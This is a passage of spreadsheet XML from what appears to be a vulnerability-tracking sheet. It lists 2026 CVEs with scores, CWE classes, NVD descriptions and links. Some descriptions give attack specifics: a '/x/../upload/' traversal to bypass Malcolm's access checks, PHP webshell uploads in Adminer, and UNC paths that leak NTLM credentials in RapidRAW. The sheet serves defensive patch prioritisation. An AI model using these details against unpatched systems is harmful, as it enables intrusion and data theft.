      <c r="J3135" s="5" t="inlineStr"/>
      <c r="K3135" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3135" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.51, is_path_within_directory() uses os.path.abspath() rather than os.path.realpath() for the workspace boundary. A symlink inside workspace can point outside and still pass the check, allowing read_file and other code tools to access files outside the configured workspace. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M3135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55540</t>
        </is>
      </c>
    </row>
    <row r="3136">
      <c r="A3136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55609</t>
        </is>
      </c>
      <c r="C3136" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3136" s="5" t="inlineStr"/>
      <c r="F3136" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3136" s="5" t="inlineStr"/>
      <c r="H3136" s="5" t="inlineStr"/>
      <c r="I3136" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3136" s="5" t="inlineStr"/>
      <c r="K3136" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3136" s="5" t="inlineStr">
        <is>
          <t>sublinear-time-solver is a Rust and WebAssembly library for solving asymmetric diagonally dominant systems in sublinear time. Prior to consciousness-explorer 1.1.2 and sublinear-time-solver 1.6.0, the export_state and import_state tools in src/consciousness-explorer/mcp/server.js pass the attacker-controlled filepath parameter to filesystem operations in src/consciousness-explorer/index.js without restricting the destination or rejecting traversal. The saveVectorToFile and loadVectorFromFile tools in src/mcp/server.ts contain the same sink class through the file_path parameter. An attacker able to invoke the MCP tools can read, write, or overwrite any file accessible to the server process, causing confidentiality and integrity loss and possible service disruption. This issue is fixed in consciousness-explorer 1.1.2 and sublinear-time-solver 1.6.0.</t>
        </is>
      </c>
      <c r="M3136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55609</t>
        </is>
      </c>
    </row>
    <row r="3137">
      <c r="A3137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55673</t>
        </is>
      </c>
      <c r="C3137" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3137" s="5" t="inlineStr"/>
      <c r="F3137" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3137" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3137" s="5" t="inlineStr"/>
      <c r="I3137" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3137" s="5" t="inlineStr"/>
      <c r="K3137" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="L3137" s="5" t="inlineStr">
        <is>
          <t>PowSyBl (Power System Blocks) is a framework to build power system oriented software. Prior to 7.2.2, UnixLocalCommandExecutor and WindowsLocalCommandExecutor concatenate command arguments and environment variables into strings interpreted through bash -c or cmd /c without sufficient escaping. Attacker-controlled values reaching UnixLocalCommandExecutor.execute, WindowsLocalCommandExecutor.execute, LocalComputationManager.execute, ParallelLoadFlowActionSimulator.run, ActionSimulatorTool.run, AmplModelRunner.run, or AmplModelRunner.runAsync can break out of the intended command and execute arbitrary shell commands as the JVM user. The affected itools paths include action-simulator with task-count, security-analysis with external, and dynamic-security-analysis. Downstream CLI tools, libraries, REST front ends, and multi-tenant grid-analysis services that forward less-trusted contingency identifiers or computation parameters into these APIs can expose the injection remotely. This issue is fixed in version 7.2.2.</t>
        </is>
      </c>
      <c r="M3137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55673</t>
        </is>
      </c>
    </row>
    <row r="3138">
      <c r="A3138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55694</t>
        </is>
      </c>
      <c r="C3138" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3138" s="5" t="inlineStr"/>
      <c r="F3138" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3138" s="5" t="inlineStr"/>
      <c r="H3138" s="5" t="inlineStr"/>
      <c r="I3138" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3138" s="5" t="inlineStr"/>
      <c r="K3138" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3138" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset/license management system. Prior to 8.6.3, a restricted user can request /api/v1/users/{target_id}/eulas to obtain another user's randomized EULA filename and then download the signed file through /account/stored-eula-file/{filename}. The primary /stored-eula-file/{filename} route correctly denies access, but app/Http/Controllers/ProfileController.php and app/Http/Controllers/Api/UsersController.php do not consistently enforce ownership and target-user authorization. This issue is fixed in version 8.6.3.</t>
        </is>
      </c>
      <c r="M3138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55694</t>
        </is>
      </c>
    </row>
    <row r="3139">
      <c r="A3139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56702</t>
        </is>
      </c>
      <c r="C3139" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3139" s="5" t="inlineStr"/>
      <c r="F3139" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3139" s="5" t="inlineStr"/>
      <c r="H3139" s="5" t="inlineStr"/>
      <c r="I3139" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3139" s="5" t="inlineStr"/>
      <c r="K3139" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L3139" s="5" t="inlineStr">
        <is>
          <t>Adminer versions before 5.4.3 contain an unrestricted file upload vulnerability in the AdminerFileUpload plugin that allows authenticated users to upload PHP files by exploiting a permissive default extension allowlist. Attackers can upload PHP webshells to columns ending in _path and execute arbitrary code as the web-server user when uploadPath is web-served.</t>
        </is>
      </c>
      <c r="M3139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56702</t>
        </is>
      </c>
    </row>
    <row r="3140">
      <c r="A3140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58262</t>
        </is>
      </c>
      <c r="C3140" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3140" s="5" t="inlineStr"/>
      <c r="F3140" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3140" s="5" t="inlineStr"/>
      <c r="H3140" s="5" t="inlineStr"/>
      <c r="I3140" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3140" s="5" t="inlineStr"/>
      <c r="K3140" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347</t>
        </is>
      </c>
      <c r="L3140" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.20, header signature verification counts the unused padding bits of the PubKeysBitmap toward the two-thirds validator quorum. These padding bits do not correspond to any validator and are ignored by the actual BLS aggregate-signature check, so a malicious or compromised block producer can set them to reach the required quorum while gathering fewer genuine validator signatures than the protocol demands. As a result, nodes that import or intercept the header accept it as correctly signed without a real two-thirds quorum, weakening consensus safety and undermining finality. This issue is fixed in version 1.7.20.</t>
        </is>
      </c>
      <c r="M3140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58262</t>
        </is>
      </c>
    </row>
    <row r="3141">
      <c r="A3141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59184</t>
        </is>
      </c>
      <c r="C3141" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3141" s="5" t="inlineStr"/>
      <c r="F3141" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3141" s="5" t="inlineStr"/>
      <c r="H3141" s="5" t="inlineStr"/>
      <c r="I3141" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3141" s="5" t="inlineStr"/>
      <c r="K3141" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-787</t>
        </is>
      </c>
      <c r="L3141" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. Versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 allow a crafted EXR with a nonzero dataWindow.min to make TypedFlatImageChannel::row() return an invalid heap pointer, causing out-of-bounds or use-after-free writes. This occurs when an application writes rows through FlatHalfChannel::row(). Affected consumers are tools, converters, render pipeline components, or image-processing services that accept untrusted EXR files and use FlatHalfChannel::row() on loaded images. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="M3141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59184</t>
        </is>
      </c>
    </row>
    <row r="3142">
      <c r="A3142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59186</t>
        </is>
      </c>
      <c r="C3142" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3142" s="5" t="inlineStr"/>
      <c r="F3142" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3142" s="5" t="inlineStr"/>
      <c r="H3142" s="5" t="inlineStr"/>
      <c r="I3142" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3142" s="5" t="inlineStr"/>
      <c r="K3142" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="L3142" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13, a crafted tiled EXR can trigger a heap out-of-bounds write on 32-bit/ILP32 builds when read through the public TiledRgbaInputFile RGBA API. The file uses a small 40x40 dataWindow but a 65537x65537 tile size. On ILP32, the Array2D&lt;Rgba&gt; tile-conversion buffer size calculation overflows, allocates a much smaller heap buffer, and tile decode writes past that allocation. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="M3142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59186</t>
        </is>
      </c>
    </row>
    <row r="3143">
      <c r="A3143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59187</t>
        </is>
      </c>
      <c r="C3143" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3143" s="5" t="inlineStr"/>
      <c r="F3143" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3143" s="5" t="inlineStr"/>
      <c r="H3143" s="5" t="inlineStr"/>
      <c r="I3143" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3143" s="5" t="inlineStr"/>
      <c r="K3143" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L3143" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.13 are vulnerable to a heap out-of-bounds write when exrmetrics reads a crafted deep scanline EXR. This occurs with pixel conversion options such as --pixelmode float or --bench because DeepSlice requests FLOAT output while the backing sample buffers are allocated using the input HALF element size. The issue is fixed in versions 3.3.13 and 3.4.14.</t>
        </is>
      </c>
      <c r="M3143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59187</t>
        </is>
      </c>
    </row>
    <row r="3144">
      <c r="A3144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59189</t>
        </is>
      </c>
      <c r="C3144" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3144" s="5" t="inlineStr"/>
      <c r="F3144" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3144" s="5" t="inlineStr"/>
      <c r="H3144" s="5" t="inlineStr"/>
      <c r="I3144" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3144" s="5" t="inlineStr"/>
      <c r="K3144" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3144" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In OpenEXRUtil versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.12, the documented TypedDeepImageChannel&lt;T&gt;::row() API can return an out-of-bounds pointer when a deep image has a non-zero dataWindow origin, resulting in a heap out-of-bounds read and crash, with potential information disclosure under a controlled heap layout. The flaw arises because ImfDeepImageChannel uses two conflicting coordinate models: at(x, y) uses absolute coordinates (with _base offset by dataWindow.min), while row(r) is documented as 0-based logical access. For a non-zero dataWindow.min, row(0) therefore points outside the _sampleListPointers allocation instead of at the first logical row. This issue is fixed in versions 3.3.13 and 3.4.13.</t>
        </is>
      </c>
      <c r="M3144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59189</t>
        </is>
      </c>
    </row>
    <row r="3145">
      <c r="A3145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59981</t>
        </is>
      </c>
      <c r="C3145" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3145" s="5" t="inlineStr"/>
      <c r="F3145" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3145" s="5" t="inlineStr"/>
      <c r="H3145" s="5" t="inlineStr"/>
      <c r="I3145" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3145" s="5" t="inlineStr"/>
      <c r="K3145" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3145" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image file format, widely used in the motion picture industry. In versions through 3.2.10, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13, the OpenEXRUtil library returns an out-of-bounds pointer from the SampleCountChannel::row() API when a deep image has a non-zero dataWindow origin. The row() accessor is documented as 0-based and computes its address from an internal base that is offset for absolute pixel coordinates, so the two coordinate models conflict whenever dataWindow.min is non-zero. For a deep image whose data window has a large negative vertical origin, row(0) points far outside the allocated sample-count buffer. An application that opens an attacker-controlled deep EXR file and accesses sample counts through row() performs an out-of-bounds read, which can crash the process or, under a controlled heap layout, return adjacent heap memory as sample-count values. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="M3145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59981</t>
        </is>
      </c>
    </row>
    <row r="3146">
      <c r="A3146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59982</t>
        </is>
      </c>
      <c r="C3146" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3146" s="5" t="inlineStr"/>
      <c r="F3146" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3146" s="5" t="inlineStr"/>
      <c r="H3146" s="5" t="inlineStr"/>
      <c r="I3146" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3146" s="5" t="inlineStr"/>
      <c r="K3146" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="L3146" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 can return an out-of-bounds pointer from TypedDeepImageChannel::row() when a crafted deep EXR has a nonzero dataWindow origin. This vulnerability occurs because the API combines zero-based row access with an absolute-coordinate-adjusted base pointer, allowing a crash or limited information disclosure. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="M3146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59982</t>
        </is>
      </c>
    </row>
    <row r="3147">
      <c r="A3147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62315</t>
        </is>
      </c>
      <c r="C3147" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3147" s="5" t="inlineStr"/>
      <c r="F3147" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3147" s="5" t="inlineStr"/>
      <c r="H3147" s="5" t="inlineStr"/>
      <c r="I3147" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J3147" s="5" t="inlineStr"/>
      <c r="K3147" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="L3147" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. In version 16.31.0 and earlier, frappe.client.set_value in frappe/client.py checks a dictionary supplied through the fieldname parameter against forbidden standard and child-table fields before parsing the dictionary into individual field names. An authenticated caller can exploit this type confusion to mass-assign protected fields through the client endpoint. No released fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="M3147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62315</t>
        </is>
      </c>
    </row>
    <row r="3148">
      <c r="A3148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62680</t>
        </is>
      </c>
      <c r="C3148" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3148" s="5" t="inlineStr"/>
      <c r="F3148" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3148" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3148" s="5" t="inlineStr"/>
      <c r="I3148" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3148" s="5" t="inlineStr"/>
      <c r="K3148" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-829, CWE-918</t>
        </is>
      </c>
      <c r="L3148" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.22.0, Orval resolves remote and local external $ref values without an allowlist or confinement to the input directory. Processing an attacker-controlled OpenAPI description can cause requests from the developer or CI host to attacker-selected or internal HTTP services, read absolute or out-of-tree local files, and inline untrusted remote schemas into generated clients. The affected code is packages/orval/src/import-specs.ts external reference loading. This issue is fixed in version 8.22.0.</t>
        </is>
      </c>
      <c r="M3148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62680</t>
        </is>
      </c>
    </row>
    <row r="3149">
      <c r="A3149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63177</t>
        </is>
      </c>
      <c r="C3149" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3149" s="5" t="inlineStr"/>
      <c r="F3149" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3149" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="H3149" s="5" t="inlineStr"/>
      <c r="I3149" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3149" s="5" t="inlineStr"/>
      <c r="K3149" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3149" s="5" t="inlineStr">
        <is>
          <t>Malcolm is a network traffic analysis tool suite. Prior to version 26.07.0, role-based access control enforced in the Nginx OpenResty Lua layer evaluates the raw, unnormalized `ngx.var.request_uri`, while Nginx itself routes requests using the normalized path. An authenticated low-privilege user can prepend a traversal segment (for example `/x/../upload/...`) so that Nginx routes the request to a restricted backend while the Lua role check fails to match any rule and falls open, granting access it should deny. Version 26.07.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M3149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63177</t>
        </is>
      </c>
    </row>
    <row r="3150">
      <c r="A3150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63652</t>
        </is>
      </c>
      <c r="C3150" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3150" s="5" t="inlineStr"/>
      <c r="F3150" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3150" s="5" t="inlineStr"/>
      <c r="H3150" s="5" t="inlineStr"/>
      <c r="I3150" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3150" s="5" t="inlineStr"/>
      <c r="K3150" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3150" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.28.0, rdpsnd_server_recv_formats in channels/rdpsnd/server/rdpsnd_main.c frees context-&gt;client_formats on a malformed Client Audio Formats PDU without clearing the owning pointer or num_client_formats. An authenticated RDP client can trigger an error such as a cbSize larger than the remaining record, leave the dangling pointer in the server context, and cause rdpsnd_server_context_free to free the same allocation again at session teardown. This reliably terminates the server and can create allocator-dependent heap corruption. This issue is fixed in version 3.28.0.</t>
        </is>
      </c>
      <c r="M3150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63652</t>
        </is>
      </c>
    </row>
    <row r="3151">
      <c r="A3151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64379</t>
        </is>
      </c>
      <c r="C3151" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3151" s="5" t="inlineStr"/>
      <c r="F3151" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3151" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H3151" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I3151" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J3151" s="5" t="inlineStr"/>
      <c r="K3151" s="5" t="inlineStr"/>
      <c r="L3151" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: mask server-provided mode to 07777 in modefromsid
When modefromsid is active, parse_dacl() applies the server-provided
sub_auth[2] value from the NFS mode SID to cf_mode without masking to
07777. Apply the correct masking, same as in the read path.</t>
        </is>
      </c>
      <c r="M3151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64379</t>
        </is>
      </c>
    </row>
    <row r="3152">
      <c r="A3152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64816</t>
        </is>
      </c>
      <c r="C3152" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3152" s="5" t="inlineStr"/>
      <c r="F3152" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3152" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3152" s="5" t="inlineStr"/>
      <c r="I3152" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J3152" s="5" t="inlineStr"/>
      <c r="K3152" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3152" s="5" t="inlineStr">
        <is>
          <t>RapidRAW before 1.6.0 does not validate the lutPath field in preset files before passing it to File::open() in lut_processing.rs. On Windows, a UNC path in lutPath causes an outbound SMB connection to an attacker-controlled host, leaking the victim's NTLMv2 credentials. The vulnerable code path is reachable through two vectors: community presets fetched automatically from the remote preset repository when the victim opens the Community tab, and individual preset files imported directly by the victim via the preset import feature (handle_import_presets_from_file in file_management.rs). The second vector does not require control of the community preset repository and is triggered when a user imports a preset file shared through Discord, forums, or similar channels.</t>
        </is>
      </c>
      <c r="M3152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64816</t>
        </is>
      </c>
    </row>
    <row r="3153">
      <c r="A3153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64826</t>
        </is>
      </c>
      <c r="C3153" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3153" s="5" t="inlineStr"/>
      <c r="F3153" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3153" s="5" t="inlineStr"/>
      <c r="H3153" s="5" t="inlineStr"/>
      <c r="I3153" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J3153" s="5" t="inlineStr"/>
      <c r="K3153" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3153" s="5" t="inlineStr">
        <is>
          <t>rConfig before 8.2.13 contains a path traversal vulnerability that allows authenticated attackers to read arbitrary files by supplying unsanitized directory traversal sequences in the filename GET parameter of the download_export() method. Attackers can craft requests with ../ sequences to escape the exports base directory and access sensitive files readable by the web server process, including application environment files containing encryption keys, database credentials, and mail configuration.</t>
        </is>
      </c>
      <c r="M3153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64826</t>
        </is>
      </c>
    </row>
    <row r="3154">
      <c r="A3154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65934</t>
        </is>
      </c>
      <c r="C3154" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3154" s="5" t="inlineStr"/>
      <c r="F3154" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3154" s="5" t="inlineStr"/>
      <c r="H3154" s="5" t="inlineStr"/>
      <c r="I3154" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3154" s="5" t="inlineStr"/>
      <c r="K3154" s="5" t="inlineStr">
        <is>
          <t>CWE-440</t>
        </is>
      </c>
